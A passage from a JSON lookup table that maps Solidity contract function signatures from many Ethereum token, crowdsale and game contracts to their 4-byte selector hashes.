"0xe00be2a9", "setMinGasPrice(uint256)": "0x90ac1866", "ArmMoneyliFe()": "0x2f646bd5", "HomeChainToken(address)": "0x318fd7e4", "MIToken()": "0x6e0b0c80", "toSecond(uint256,uint256)": "0x019f80b6", "transferAndFreeze(address,uint256,uint256,uint256,uint256,uint256)": "0xca2748bd", "freezeAccount(address,uint256,uint256,uint256,uint256,uint256)": "0x91e1cc5a", "toggleContractActive()": "0x1385d24c", "Iou()": "0x32608243", "approveAndCall1(address,uint256,bytes)": "0x4817db70", "transferTo(address[])": "0xbf24de3d", "BonumPromoToken()": "0x2e8c5793", "HOHO(uint256,string,string)": "0xa31d291a", "CDSToken()": "0x774a63a5", "setPreSaleRate(uint256)": "0x352ff2bd", "maximumSupply()": "0x0480e58b", "FitToken()": "0x2bcfe0a6", "Zerk()": "0x17241962", "SwingerTokenSPICO()": "0x00ad8035", "Zigit()": "0xc01e8b6a", "LOOT()": "0xebfda085", "mintByMintable(address,uint256)": "0x4eb396cd", "addMintable(address)": "0x922587ff", "ISAO()": "0x16145311", "NEXPARA(uint256,string,string)": "0x9a18a5ba", "QuyDau()": "0xf08697a3", "WGCToken()": "0x53b2dd41", "MBLToken()": "0xbf419975", "XiaoMuBiaoERC20()": "0x06c5b9d0", "calclulateBonus(uint256)": "0xa43e0c2b", "Sale(uint256,uint256,address)": "0xc6c6b3ed", "TheBitcoinCenterToken()": "0xb599aaec", "MNXToken()": "0xd25ff342", "MithrilValkyrie()": "0xb2b877c1", "MonsterTokenCrowdsale(uint256,address,address,uint256,uint256)": "0xd0435cb0", "UBS()": "0xe4adc325", "Myastheniagravis()": "0x98d764be", "HamsterMarketplaceToken()": "0x11d634ac", "purchaseRect(uint256,uint256,uint256,uint256,uint256[])": "0x1602c424", "applyPixelChange(uint256,uint256,uint256,uint256,uint256[])": "0xd94fd026", "purchasePixel(uint256,uint256,uint256)": "0xed1426e6", "priceForRect(uint256,uint256,uint256,uint256)": "0xefbd4bff", "pixelPrice(uint256,uint256)": "0x7f4af951", "setPixelRate(uint256)": "0x1ac10f1f", "AOMcoinERC20()": "0xc1c5897e", "getManagerAddress(uint256)": "0xaac80472", "approveTokens(bytes32,address,uint256)": "0x0e83afbb", "getTokens(address,bytes32,uint256)": "0xbe571e8f", "getGalleassTokens(address,bytes32,uint256)": "0x86e58c0c", "_transferAll(address,uint256)": "0x46c66b27", "checkLoanStatus(address,uint256)": "0x374f7b7e", "_takeAll(address,address,uint256)": "0xcaa872ae", "deletePawn(uint256)": "0x153d3572", "invite(address,bytes)": "0x0a8a2485", "allow(address,uint256)": "0x6c6f31f2", "destroycontract(address)": "0x422624d2", "BEST()": "0x39d8dc9b", "AddresstoAsciiString(address)": "0xfc8bbb6d", "getcertifieddata(uint256)": "0x504b97ae", "addcertifieddata(string,string,string)": "0xe0d79d38", "getcertifieddatacount()": "0x7ff2cf93", "blockchaincertified()": "0xd7b5507d", "countZTKChecks()": "0xf5fd1936", "getZTKCheck(address,address)": "0xcd953744", "getZTKChecks()": "0x558f46c8", "registerZTKCheck(address,string,string,string,string,string,uint256,string,string,int256,uint256)": "0x0799f1b2", "ZTKGamers()": "0x78a8b1fb", "BOBOTOKEN3()": "0x3af2b770", "getCoinInfo(string)": "0xe1221400", "getIsCoinReg(bytes4)": "0xa9901c6b", "getHexSymbol(string)": "0x46ae38a8", "getCoinAddress(bytes4)": "0x0e99b380", "getSymbol(string)": "0xaaba3e3b", "getName(string)": "0x6932cf81", "registerCoin(bytes4,string,string,address)": "0x733dca75", "securityReg(address)": "0x52e021c2", "DEXK()": "0xcad9639d", "getInstructor()": "0x3c1b81a5", "setInstructor(string,uint256)": "0x22faf03a", "setName(uint256,uint256,bytes32)": "0xdd090981", "NordstromOnlineRetailDigitalCoin()": "0x88054039", "upgradeGalleass(address)": "0x3319bf1a", "hasPermission(address,bytes32)": "0xb0619e85", "setContract(bytes32,address)": "0x7ed77c9c", "Galleass(string)": "0x0b1bf3e2", "setDescendant(address)": "0xcc268393", "Predecessor()": "0x291bc657", "production()": "0x05e88b69", "checkDelegation(address)": "0x63f22c24", "isActiveDelegate()": "0xa80aee59", "getDelegate(uint256)": "0xdcc66cc2", "NewSmartSharingContract(string,uint256,uint256,string,string,string,string)": "0x47a69105", "payAdvertisers(bytes32)": "0xbb37a162", "NewSmartSharingContract(string,uint256,uint256,string,string,string,uint256,string)": "0xb40ee3b3", "CertifyDelegate(address,uint256)": "0x5740a4be", "addDelegate(string)": "0x405c6f6e", "isAlreadyDelegate()": "0x736d7c52", "Engrema()": "0x077d3f8c", "getSmartHash(string)": "0xf08a5faa", "getNumAcceptance(address)": "0xaf4c2288", "getMyAcceptance(address,uint256)": "0x5c328e3d", "getAcceptance(bytes32,address)": "0x89c67976", "getWebsite(address,uint256)": "0x5612e139", "getSmartSharingByHash(bytes32)": "0xe86d24ca", "getSmartSharingByID(uint256)": "0xe78721af", "countSmartSharingContract()": "0xfec966df", "countAllUsers()": "0xec439d67", "countAllSmartSharingContract()": "0xb60cee3c", "countWebsite(address)": "0x2ef6d6c0", "getUserFromId(uint256)": "0xbe4eb0e9", "getUserIpfsFromId(uint256)": "0xd76e5765", "getUserFromAddr(address)": "0x02d596d8", "Certify(address,uint256)": "0xbdbf40a9", "destroyUser()": "0x50e513ac", "Accept(bytes32,string)": "0x4a45beed", "NewSmartSharingContract(string,uint256,uint256,string,string,string)": "0x8723202e", "addWeb(string)": "0xfd6bb46c", "updateUser(string)": "0x0b4f12f6", "isAlreadyIn()": "0x887651cc", "isEpocum()": "0x4882419d", "resetEpocum(address)": "0x22b79623", "epocum()": "0xb00124c4", "updateNetworkConnection(string,string,address)": "0x41a42ba2", "lastFreeBlock()": "0xddc53c2c", "changeETXAddress(address)": "0xc7431f5c", "etxAddress()": "0xb775c9ef", "buyOrderBalances(bytes32)": "0x5a476e5a", "makeFee()": "0x20c8651b", "takeFee()": "0x181aa1fd", "sellOrderBalances(bytes32)": "0x0f5137f9", "getConfigBoolz(bytes)": "0xcda87e33", "initBallotProxy(uint8,bytes32,bytes32,bytes32[4])": "0x94f6e8ed", "getNetworkId()": "0x39c5f3fc", "calc(bytes4,bytes32,uint256,address,bytes24)": "0xeb053fad", "HODL()": "0x47786f51", "tokenValue(address)": "0x513f7d1e", "SBSolutions()": "0xc0ab86bd", "Capital()": "0xa1d53160", "closeAndTransferTokenOwnership()": "0x8d24abbc", "PrymexPreICOCrowdsale(uint256,uint256,uint256,address)": "0x32807be0", "VinzCoin(uint256,string,uint8,string)": "0x8919e3b6", "NCRCoin()": "0xf6a0be88", "finalizeContract(uint256)": "0x2907eb16", "getUserVotes()": "0x65e93b3f", "voteRequest(uint256)": "0x4cb6f4a5", "CMGF()": "0x8f2ef6b7", "killedContract()": "0x2c4e55c5", "_assign(address,uint256)": "0xca792754", "calculateNonVestedTokens(uint256,uint256,uint256,uint256,uint256)": "0x0c9bc2c0", "transferrableBalance(address,uint256)": "0x57fdf2b2", "spendableBalanceOf(address)": "0x0f8f8b83", "canForward(address,bytes)": "0xc0774df3", "forward(bytes)": "0xd948d468", "revokeVesting(address,uint256)": "0xfa6799f2", "assignVested(address,uint256,uint64,uint64,uint64,bool)": "0x21cb18cd", "assign(address,uint256)": "0xbe760488", "unwrap(uint256)": "0xde0e9a3e", "wrap(uint256)": "0xea598cb0", "test_fourValidEqInt()": "0x9dd819cc", "test_fourInvalidEqInt()": "0x92e598f3", "test_threeValidEqInt()": "0x83537b5f", "test_threeInvalidEqInt()": "0x415fad10", "test_twoValidEqInt2()": "0x42367389", "test_validContractBalance()": "0xc93cff84", "test_twoValidEqInt()": "0x8b542d74", "test_invalidBalanceNotZero()": "0xfff04a87", "test_invalidValue1EqValue2()": "0x94dfd38a", "test_invalidEmptyEqVal1()": "0x91c3352e", "test_invalidAddressNotZero()": "0xa0d9669c", "testThrow_invalidZeroValue1()": "0x4bd4ddb9", "test_invalidEmptyEqVal()": "0x7df7ec18", "test_invalidEmptyNotOne()": "0x23d73ca5", "test_validEmptyEqEmpty256()": "0x0e7c5d2b", "test_validEmptyEqEmpty()": "0x78d6525f", "test_oneValidEqInt3()": "0xd4186ba4", "test_oneValidEqInt2()": "0x3376887a", "test_oneValidEqInt1()": "0xda7ccce9", "AnotherStorage(address)": "0xe549053f", "GSContract(uint256)": "0x3a306682", "onTokenTransfer(address,address,uint256)": "0x677ba3d3", "_updatePurchasingState(address,uint256)": "0x1bdc4038", "_preValidatePurchase(address,uint256)": "0xfcb2acd5", "getUserContribution(address)": "0xbb8b2b47", "getUserCap(address)": "0x8b58c64c", "setGroupCap(address[],uint256)": "0xa31f61fc", "setUserCap(address,uint256)": "0xc3143fe5", "approveToken(address,address,uint256)": "0xda3e3397", "sendToken(address,address,uint256)": "0x2fdcfbd2", "finishRecovery()": "0xc7423803", "cancelRecovery()": "0x0ba234d6", "startRecovery(address)": "0xbd5021af", "removeRecoveryAddress(address)": "0x7e3bfa1d", "addRecoveryAddress(address,uint8)": "0x345a5fe4", "RecoverableWallet(address)": "0xa2471fa5", "Claimable(address)": "0x1e3a5831", "Ownable(address)": "0xf1684237", "getWalletFor(address)": "0x8208921d", "createWallet(uint8)": "0x35f6c161", "testAdd(uint256,uint256,uint256)": "0xc4f8b9fb", "testMul(uint256,uint256,uint256)": "0xe01330bb", "testDivAdd(uint256,uint256,uint256,uint256)": "0x59e3e1ea", "testMulMod(uint256,uint256,uint256,uint256)": "0x15d42327", "getAnnualGrantsLength()": "0x4d5ad11e", "flightDone(uint32)": "0x4f9ea1c3", "DroneEmployeeROS(address,int256,address,address)": "0x19a72fef", "auditReport(address,bool,bytes32,bytes32)": "0x1fbfe6f3", "custodianTransfer(address,address)": "0xeb245d91", "vendorVerify(address)": "0x15d87dc4", "custodianVerify(address)": "0xaf9658cd", "getLastAuditDocumentation(address)": "0x866192a2", "getLastAuditExtradata(address)": "0x9b7502c3", "getLastAuditAuditor(address)": "0x88b75493", "getLastAuditPass(address)": "0x19b1f94b", "getLastAuditTime(address)": "0xfbf9180e", "getLastAuditId(address)": "0x790377dc", "getGoldInfoDocumentation(address)": "0x9d42829a", "getGoldInfoSku(address)": "0x6157c5ec", "getGoldInfoSerial(address)": "0x5af6333d", "getGoldInfoWeight(address)": "0x38d28de3", "getGoldInfoCustodian(address)": "0x4f1e0d0b", "getGoldInfoVendor(address)": "0xef058f52", "getGoldStatusLastauditid(address)": "0x19291c74", "getGoldStatusRegistered(address)": "0x4ad9d7ab", "getGoldStatusAuditcount(address)": "0x67286a83", "getGoldStatusMinted(address)": "0xcc3f44bf", "getGoldStatusCustodianverify(address)": "0xde20555f", "getGoldStatusVendorverify(address)": "0x22fb71f1", "getGoldStatusCode(address)": "0xeb18747a", "registerGold()": "0x23c850db", "checkRegistrar()": "0x9140a101", "checkAuditor()": "0xf51119db", "checkVendor()": "0x5f7d897e", "checkCustodian()": "0x85216449", "getParticipantRegistry()": "0xcf8f4d4f", "setConfiguration(address)": "0x627f09c3", "GoldRegistry()": "0xb70fbda1", "goldRegistry()": "0x7d92f6be", "sendToMinter(uint256)": "0xf9244a9b", "getRegistryDataMinter()": "0x7e20e7c0", "getRegistryDataCustodian()": "0x18d92a5d", "getRegistryDataVendor()": "0x4b69c3d4", "getRegistryDataRegistry()": "0x8c259654", "getRegistryDataRegistered()": "0x5fe44141", "getRegistryDataInitialized()": "0x270ba309", "getGoldDataDocumentation()": "0x226454c1", "getGoldDataSku()": "0x22e78480", "releaseMultiAccounts(address[])": "0x4ded9bfe", "getRemainReleaseTimeOfStage(address,uint256)": "0x04def102", "getRemainOfStage(address,uint256)": "0x918307fd", "getEndTimeOfStage(address,uint256)": "0xe8789d88", "getLockedStages(address)": "0xec47a795", "setNewReleasePeriod(address,uint256,uint256)": "0x46533d60", "setNewEndtime(address,uint256,uint256)": "0x8dbc2fd1", "releaseAccount(address)": "0x85c373c3", "releaseAllOnceLock()": "0x082a4513", "transferAndFreeze(address,uint256,uint256,uint256)": "0x2dda30a7", "freeze(address,uint256,uint256,uint256)": "0x6c9c5944", "needRelease()": "0x69e111ba", "getRemainLockedOf(address)": "0xcfdba320", "removeLockedTime(address,uint256)": "0xf1781c72", "removeAccount(uint256)": "0xc2d42ef2", "changeOwnershipto(address)": "0xede930c9", "transferOwnershipBack()": "0x25f731c8", "bindContract(address)": "0x8157d4b5", "frozenAmount(address)": "0x86602c84", "freezeAccountPartialy(address,uint256)": "0x4aacd437", "leggiFrase(uint256)": "0x37f50f5b", "totaleFrasi()": "0x1fe93774", "aggiungiFrase(string)": "0x7ecb6475", "primoContratto()": "0xab7ec692", "_createRide(string,bytes7,address,uint256)": "0x59fb34bd", "purchase(uint256,bytes7)": "0xcdf574f1", "getRide(uint256)": "0x7c7b0ff4", "createContractRide(string,bytes7)": "0x63746b03", "createPromoRide(address,string,bytes7,uint256)": "0x4a92fa06", "CryptoRides()": "0x867c6e23", "setItemStoppedStatus(bool)": "0x599dc6be", "transferItem(uint256,address,uint256)": "0x89f27d55", "transferItemFrom(uint256,address,uint256,uint256)": "0x1046d078", "getItemAllowancePrice(uint256,address,address)": "0x6ab9eb45", "getItemAllowanceAmount(uint256,address,address)": "0x457c600c", "allowanceItem(uint256,uint256,uint256,address)": "0x24223a3c", "buyItem(uint256,uint256)": "0x9979c009", "setItemLimitHolding(uint256,uint256)": "0xc3aa0fe6", "setItemPrice(uint256,uint256)": "0x4229c35e", "setItemTransferable(uint256,bool)": "0x0cf8bcab", "setItemApproveForAll(uint256,bool)": "0xebb05f9c", "setItemOption(uint256,string)": "0x9301eb36", "getItemAmountOf(uint256,address)": "0x690d23be", "createItem(string,uint256,uint256,bool,bool,string,uint256)": "0xfa695dd7", "createItemId()": "0x963812c3", "rain(address[],uint256)": "0x4f538ae1", "unfreezeAccounts(address[])": "0x170e2070", "freezeAccounts(address[])": "0xaad12029", "setPauseStatus(bool)": "0xc38bb537", "SGEPreICO()": "0xed22c02f", "ELTWagerLedger(address)": "0xb3b55c0f", "participate(address,uint256)": "0xb64afbe5", "newToken(string,uint8,string)": "0x8499ee3a", "initialise(address,uint256,uint256,uint256,uint256,uint256,string,uint8,string)": "0xe5363ab8", "isAddressFrozen(address)": "0x95a3e2af", "freezeAddress(address,bool)": "0x694df50a", "Token(string,uint8,string)": "0xd4582b56", "subtractFee(uint256)": "0xc0567656", "setFee(uint256,uint256,uint256,uint256)": "0xa2a957bb", "unlockContract()": "0x22f0f2f9", "lockContract()": "0x753868e3", "VapeToken()": "0x22ee46db", "TipSmartToken()": "0xa28bc99a", "getUnitsStealingCapacity(address,uint256,uint256)": "0xeb64d5ce", "getUnitsDefense(address,uint256,uint256)": "0x5e6b7a5c", "getUnitsAttack(address,uint256,uint256)": "0xd104bca2", "JadeCoinMining(address,uint256)": "0xb013fa91", "updatePlayersCoin(address)": "0xe3396d2f", "getlastJadeProductionUpdate(address)": "0x15eaf224", "JadeCoin()": "0xbb05ca52", "setDrawAddress(address,address)": "0xdf40a089", "setRaffleAddress(address,address)": "0xef59f8c8", "setAttackAddress(address,address)": "0x0613d936", "setPLATAddress(address,address)": "0x9e84158e", "setTradeAddress(address,address)": "0x5bf042e5", "getTokensForContribution(uint256)": "0x69c5f36e", "getTokensRemaining()": "0x46ad5859", "withdrawEtherRemaining()": "0x8c08ae0d", "withdrawTokensRemaining()": "0x50f91ee3", "changePeriodTime(uint256,uint256)": "0xc60cae29", "changeTokenForSale(uint256)": "0xf5c6cf05", "VRCoinCrowdsale(address)": "0x332ea9ed", "Illuminatus()": "0xc7a24403", "PLN()": "0xacd84e24", "FITN()": "0xede8e035", "CryptoSim()": "0x4d5c07aa", "LigoToken(uint256,string,string)": "0xaf7bcf5e", "Btczocker(uint256,string,uint8,string)": "0xa863f595", "getInsurance(bytes32,uint256)": "0x6d28e805", "getInsurancesCount(bytes32)": "0xbeff6dbf", "manualInsuranceResolution(bytes32,uint8,bytes32)": "0x4ef1a23a", "updateFlightStatus(bytes32,uint256)": "0xb54cd451", "addNewInsurance(bytes32,uint256,uint32,uint32,bytes32)": "0xb52c64c7", "areStringsEqual(bytes32,bytes32)": "0x16c45c7a", "Fizzy()": "0x97b0ad7d", "QuadCoreChain()": "0xc1551fc8", "ownerMint(uint256)": "0xf19e75d4", "updateSaleStatus()": "0xbd36a5cd", "GameGoldToken()": "0x73e67a38", "Mmchain(uint256,string,string)": "0x8ea98db4", "returnToken(uint256)": "0x6178efee", "calculateBid(uint256)": "0x2d4a170a", "ERC721Auction(address)": "0x24c034a7", "saveToken(uint256)": "0x6869b20e", "buyAuction(uint256)": "0xfd8acc42", "startAuction(uint256,uint256,uint256)": "0x91e078bb", "getCooldown(uint16)": "0xff429fc8", "getFishParams(uint256,uint256,uint256,address)": "0xbdd7908b", "setCooldowns(uint32[100])": "0x14986f5b", "convertChest(uint256)": "0x923f1788", "mintChest(address,uint16,uint24,uint24,uint8,uint8)": "0xc2356d23", "FishbankChests(address)": "0x6a7d3c1c", "buyChest(uint16)": "0x064701c6", "setChestPrice(uint16,uint256)": "0xd1d46d2b", "setChestProduct(uint16,uint256,uint16,bool,uint32,uint24,uint24,uint8,uint8)": "0x0f3fc29e", "initChestsStore()": "0x9e39db38", "ChestsStore(address)": "0xeeac848b", "Beneficiary()": "0x73d55379", "valueOf(address)": "0xa48028aa", "tokenValue()": "0x1ec7e345", "setRestrictedAcct(address,uint256)": "0xe4372d0f", "initTokenSupply(uint256)": "0xfc2b8b7b", "BurnableToken()": "0x37306299", "unPaidBurnTokens(uint256)": "0x1d5f624a", "requestDivident()": "0xd305a45d", "main_ico(address,uint256)": "0xd086a201", "pre_ico(address,uint256)": "0x8a593cbe", "blockoptions()": "0x45aa83d8", "gameInfo()": "0xdb73bfce", "itemHistoryOfPlayer(uint256,address)": "0x94bb7d64", "excessRefund(address,uint256)": "0x777e940c", "updateTimestampLimit()": "0xb4a8dd5b", "updateWorldScore(uint256,uint256)": "0x768b4ce0", "updateScoreAndBalance(uint256,uint256,address,address)": "0xa75a4e4a", "emitInfo(uint256,uint256,address,uint256,uint256)": "0x27669781", "bonusPreviousOwner(uint256,uint256,uint256)": "0xfa34b37b", "payReferrer(address,uint256)": "0x50d12a72", "setReferrer(address,address)": "0xbbddaca3", "getReferrerOf(address)": "0xbc7f25e4", "confirmDividendsFromPot()": "0x418f1487", "confirmDividends()": "0xa1207708", "getOldBalance(uint256,address)": "0x8bda1540", "updateEntity(uint256,address,uint256)": "0x19b24684", "newEntity(uint256,uint256)": "0x70c6b20c", "getParticipantesB()": "0xa43d12a7", "getParticipantesA()": "0x6a0c5068", "sacarWEA()": "0xbf75553a", "sacarETH()": "0xa4b8a543", "setNEW(address,uint256,uint256,uint256,uint256)": "0x0686dc8d", "Clean()": "0x2a5e695e", "ChooseBwea()": "0xb034998b", "ChooseAwea()": "0x56d7c0da", "ChooseB()": "0xf1ebe451", "ChooseA()": "0x1b4b546f", "BetWEA(address,uint256)": "0x44bc3e27", "ProvideToken()": "0xc32426c9", "setUpgradeController(address)": "0x0de54c08", "completeTransaction()": "0xb3ae1d2c", "complete(uint256,string)": "0x2e28fd42", "ProvideWorkOrder(address,address,address,address,address,uint128)": "0xf84ad0fb", "setPaymentEscrow(address)": "0xd8a2848d", "setPrvdWallet(address)": "0x5c1b3a68", "setPrvd(address)": "0xd7e0d83d", "createWorkOrder(address,uint128)": "0x020eb6e1", "Provide(address,address,address,address)": "0x0ad137c4", "contract_transfer(uint256)": "0x2762cf10", "setCrowdsaleInterface(address)": "0xdcbda04c", "finally(address)": "0x76e7430e", "BGXToken()": "0x052f1a7a", "addBonus(uint256)": "0x111878f6", "Wafflecoin()": "0xe9799993", "getPoolAvgHatchPrice()": "0x7081d5da", "getDiff(uint256,uint256)": "0xd7734855", "getLastHatchPrice(address)": "0x44a9ff76", "calculateEggSell(uint256,address)": "0x654a95f2", "getBestOffer(address,address)": "0x0374fc6f", "YODCToken()": "0x21f72d82", "DestiNeedToken()": "0x654b6105", "getDistributedToken()": "0x27d6ba21", "KinguinKrowns()": "0x8a529159", "ETHernitymining(address)": "0xa81daf29", "ProofOfBitconnect()": "0x5cf2f261", "cancelActiveAuctionWhenPaused(uint40)": "0xb2fb3b90", "cancelActiveAuction(uint40)": "0x98c9faac", "getCurrentPrice(uint40)": "0x7ea310d4", "getAuctionInfo(uint40)": "0x9ccaec98", "_computeCurrentPrice(uint128,uint128,uint40,uint40)": "0xaeb7dd80", "_removeAuction(uint40)": "0xdbc9ef42", "_bid(uint40,uint128)": "0x548707cd", "_cancelActiveAuction(uint40,address)": "0xe796c43c", "bid(uint40)": "0xc170fd54", "createAuction(uint40,uint128,uint128,uint40,address)": "0xc1d1faf3", "getFalconmasterReq()": "0xcef0e9e2", "getMyFalcon()": "0x63eac2d4", "getFreeFalcon()": "0x6f5736c6", "becomeFalconmaster()": "0x7bd7c891", "FalconFarmer()": "0xe744052b", "stopOraclize()": "0xc2d560ab", "requestOraclizeBalance()": "0x9c977e43", "addEtherForOraclize()": "0x8d4ea1ba", "addOperator(address,uint256)": "0x0f7fa72f", "updateFeatures(uint256)": "0xd5bb7f67", "contains(string,string)": "0x3fb18aec", "FUNK()": "0x14f0ff32", "UltiCoin()": "0x9c639db4", "TERSERAH()": "0xf2663a03", "WowDiaondToken(address)": "0x1b8a0b46", "updateEscrow(uint64,uint256)": "0xf6ed5342", "paymentDue(address)": "0x366f2d86", "EthereumGoldPro()": "0x8740b73d", "Purchase(address,address,address)": "0xa2f45660", "GetAquiredAssetBalance()": "0x3b14ab12", "sendICO(address,uint256,address)": "0x3f615272", "PenchantICO()": "0x23ffcc3e", "UzairToken()": "0xc56f1578", "buyPerSell(uint16,bytes32)": "0x8a3907b9", "updateInteface(address,address)": "0x8a874084", "GetPerSellInfo(uint16)": "0x227ac0cf", "PerSellOver(uint16[])": "0xf98e17a7", "updatePerSell(uint16,uint256,bool)": "0x5d66ccf0", "addPerSell(uint16,uint256,bool)": "0xdd193e7b", "GetAddressByName(bytes32)": "0xba9d407a", "checkUp(address,bytes32)": "0xc9af2418", "createInviteName(bytes32)": "0x93e7d6c6", "getPortion(uint256,address)": "0x407ea214", "_distribute(address)": "0x308a9717", "createBet(uint256)": "0xac793a60", "addToJackpot()": "0x256bcaa0", "fechPreAllSumNumForCandidate()": "0x2b4a27cb", "fechSumNumForCandidateByStage(address,uint256)": "0x0aad1f3b", "fechAllSumNumForEncourage(uint256)": "0xc6fadeb3", "fechAllSumNumForCandidateByStage(uint256)": "0x30765517", "fechCurrentStageIndex()": "0x905ae5f5", "fechStageIndexByBlockNum(uint256)": "0x08c7e75c", "fechStageBlockByIndex(uint256)": "0x4287eef9", "fechAllCandidatesByStage(uint256)": "0x7d049675", "jembex()": "0x64978c7f", "createCustomCrowdsale(uint256,uint256,uint256,uint256,uint256,uint256,address,uint256,address)": "0x338ed326", "grantTokenOwnership(address)": "0xd1301074", "setOnePowerAge(uint256,uint256)": "0x85482f89", "setTwoPowerAges(uint256,uint256,uint256,uint256)": "0x855ce579", "setThreePowerAges(uint256,uint256,uint256,uint256,uint256,uint256)": "0x4ba2d5ff", "isValidPurchase(address)": "0x1f8712af", "setWhitelistThresholdBalance(uint256)": "0xfe164a5b", "setMaxWhitelistLength(uint256)": "0x7e737551", "isAllowedBalance(address,uint256)": "0x0317c06e", "removeFromWhitelistInternal(address,uint256)": "0x938f407a", "addToWhitelistInternal(address)": "0xbaea3a21", "setWhitelistThresholdBalanceInternal(uint256)": "0x22fc3149", "setMaxWhitelistLengthInternal(uint256)": "0x94954967", "isWhitelistEnabled()": "0x184d69ab", "isAllowedWhitelist(uint256,uint256)": "0xca5a3b4a", "Now()": "0x44d4fd19", "Run()": "0x5da0a987", "SendDivs()": "0x5ba67330", "NetCents()": "0x646d525a", "finalizeVault()": "0xc3cb8c14", "forceWithdrawToken(address)": "0x3866ecdd", "lockToken(uint256)": "0x80f20363", "LIC(uint256,string,string,uint8)": "0x02e6a5dc", "changeUserCertificate(bytes32)": "0xcb70d9a7", "changeUserEduExp(bytes32)": "0xd12b51c0", "changeUserProjectExp(bytes32)": "0x8d13ea34", "changeUserLangAbility(bytes32)": "0xd533d0db", "changeUserInfo(bytes32)": "0x881362b4", "setUserYan(address,uint32)": "0x81236e47", "setUserScore(address,uint32)": "0x03f3b07f", "userDelete(address)": "0x382cbc79", "userAdd(address)": "0xc987c5a1", "dividendBonus(address,uint256,uint256)": "0x88dbe7a7", "resetBonusPool(uint256,uint8)": "0x0ed0b19f", "setServerAdmin(address)": "0xcba8be1c", "getScoreTotal()": "0x5a3dd13f", "getBonusPool(bool)": "0xb425282d", "getYanCoefficient(uint256,uint32)": "0xd13a64d3", "RunManager(bool)": "0x7161c66d", "Planetagro_Exchange(address)": "0xd42cc0d1", "setCurrencyExchangeRate(uint256,uint256,uint8)": "0x77ffd2e8", "addCurrencyExchangeRate(uint256,uint8)": "0xb1276a42", "Lescovex_CYC(uint256,string,string,address)": "0x9dfcf372", "revokeAdmin(address,address)": "0x3c5395b2", "sendEthers(address,uint256)": "0x8e3ed7d7", "createGato(uint256)": "0xdf833a1a", "hashSecret(bool,bytes32)": "0xe33ba574", "updateFunds(uint256,uint256,uint256,bytes,bytes,bool,bytes32,bytes32)": "0x9ea8a418", "verifyWining(uint256,uint256,uint256,bytes,bytes,bool,bytes32,bytes32)": "0x4131f609", "registerUnlock()": "0x1ce00c50", "updateFunds(address,uint256)": "0x0ba6d271", "withdrawfund()": "0x3f14e2db", "SedPoSToken()": "0xc7af18f1", "IxiniumFundingCoin()": "0x064fe208", "MariaToken()": "0x5ea82efb", "ForkDelta(address,address,uint256,uint256,address)": "0xcdb616b2", "generateRandomNumber()": "0x773a1154", "setdividendFee(uint8)": "0xe16e2843", "_inRateFallEffectLimit(uint256,uint256)": "0xd70efa86", "_deliverTokens(address,uint256,uint256,uint256,address)": "0x04fb82cc", "_orderTokens(address,uint256,uint256,address)": "0x7305c695", "acquireTokens(uint256,uint256,address,uint256,address)": "0x6051c7cd", "getOraclizeCallbackFee()": "0x151b2342", "STRToken()": "0xcbc469de", "payOutBounty(address,address)": "0x6921af97", "ownBalance()": "0xd4bde313", "RedBlue()": "0xd98299a0", "AutoBusinessFinance()": "0x7db42b6c", "ClipToken()": "0x897032e3", "ElextroCoin()": "0x4c982872", "HackDivs()": "0x0fd7b03d", "Encrypt(uint256)": "0xd386130c", "Hacksig(uint256)": "0x12e530aa", "XfiniteUtility()": "0x7bd2593d", "HappyEthericHome()": "0xa9607011", "childTokenByIndex(address,uint256,uint256)": "0x051847d5", "totalChildTokens(address,uint256)": "0x8600f2ec", "receiveChild(address,uint256,address,uint256)": "0x597c255f", "mokenNameBytes32(uint256)": "0x2b513549", "mokenName(uint256)": "0x393bbbf8", "mokenNoName(uint256)": "0xced9f7c0", "mokenBytes32(uint256)": "0x78e90190", "moken(uint256)": "0x191e521f", "mokenEra(uint256)": "0xb5d446ab", "eraFromMokenData(uint256)": "0x5b72c3b7", "eraFromMokenData(bytes32)": "0x993783fc", "mokenData(uint256)": "0x8cce49c9", "mokenId(string)": "0x72e09d48", "mokenNameExists(string)": "0x1721ebba", "validateAndLower(string)": "0x7575ecf6", "contractMint(address,string,bytes32,bytes32,uint256)": "0x0b4dfc77", "mintContractByIndex(uint256)": "0x7106bd46", "totalMintContracts()": "0x3f124f1d", "isMintContract(address)": "0xb84fed88", "mint(address,string,bytes32)": "0xd34047b6", "mintPrice()": "0x6817c76c", "mintData()": "0x5195e8c5", "totalEras()": "0xb30841d9", "eraExists(bytes32)": "0xa89196a6", "currentEraIndex()": "0xd754f3d5", "currentEra()": "0x973628f6", "eraByName(bytes32)": "0xaa67bc04", "eraByIndex(uint256)": "0x37a2890d", "randomtest()": "0x4466862a", "distributeFunds(uint8)": "0x580bd977", "startOver()": "0xcc0e1f66", "setMaxNumber(uint8)": "0x324a5562", "MMaker()": "0x16e82dcf", "submitWithdrawTransaction(address,uint256)": "0xe29bfe13", "GamingCoin(string,string,uint8)": "0xad86c10d", "fromFraction(int256,int256)": "0xe01546a8", "fromInt256(int256)": "0x2f7dbc9b", "getExpectedGameSize()": "0x17c4fcbf", "calcDifficulty()": "0xc724acb7", "getDifficultyAsFixedPointForGameId(uint256)": "0x0756f58f", "getPopRemainingAsFixedPointForGameId(uint256)": "0x564a187f", "getPotAsFixedPointForGameId(uint256)": "0x2578117b", "getInitialSeedAsFixedPointForGameId(uint256)": "0xeee144df", "redeemPop(uint256)": "0x0019c97d", "minePoP(address,uint256)": "0x716af639", "potentiallyCirculatingPop()": "0x0ccfdd8b", "unPromisedPop()": "0x65d6dbbd", "promisedPop()": "0xb99f48d5", "unMinedPop()": "0xcf5f2201", "getSeedAmountForGameId(uint256)": "0xfed7bb07", "getBankRollGrowthForGameId(uint256)": "0x9914038a", "Int256(uint256)": "0x595ecbb3", "UInt256(int256)": "0xab8efb87", "processEndGame(uint256)": "0x0d54c49e", "amountOfPopDeveloperShouldMine(uint256)": "0x69e6e6c9", "amountToTakeAsRake(uint256)": "0xb015b81a", "addToBonusSeed()": "0x0c6de527", "amountToSeedNextRound(uint256)": "0x693cf8ce", "betAmountAfterRakeHasBeenWithdrawnAndProcessed(uint256)": "0x78879d74", "totalAmountRaked()": "0xe12ee8d7", "getWinningsForRecordId(uint256,bool,bool)": "0x20544010", "getPlayerInternalWallet()": "0x43bdaacb", "getCurrentMiningDifficulty()": "0x9c3db309", "getBetRecord(uint256)": "0xcfbf9a36", "playerPopMining(uint256,bool)": "0x5f72a508", "getMyBetRecordCount()": "0xed3f443f", "addToRakePool()": "0x0fcac452", "updateNextGameMinAndMaxBlockUntilGameEnd(uint256,uint256)": "0x31f0528e", "PoP()": "0x46d1501a", "MongoliaNationalToken()": 